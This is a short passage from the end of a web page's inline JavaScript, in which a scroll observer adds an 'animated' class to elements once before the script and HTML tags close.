    observeElements('.animate-on-scroll', (el) => {
        el.classList.add('animated');
    }, { once: true });
});

// ============================================
// End of JavaScript Animations Library
// ============================================
</script>
</html>
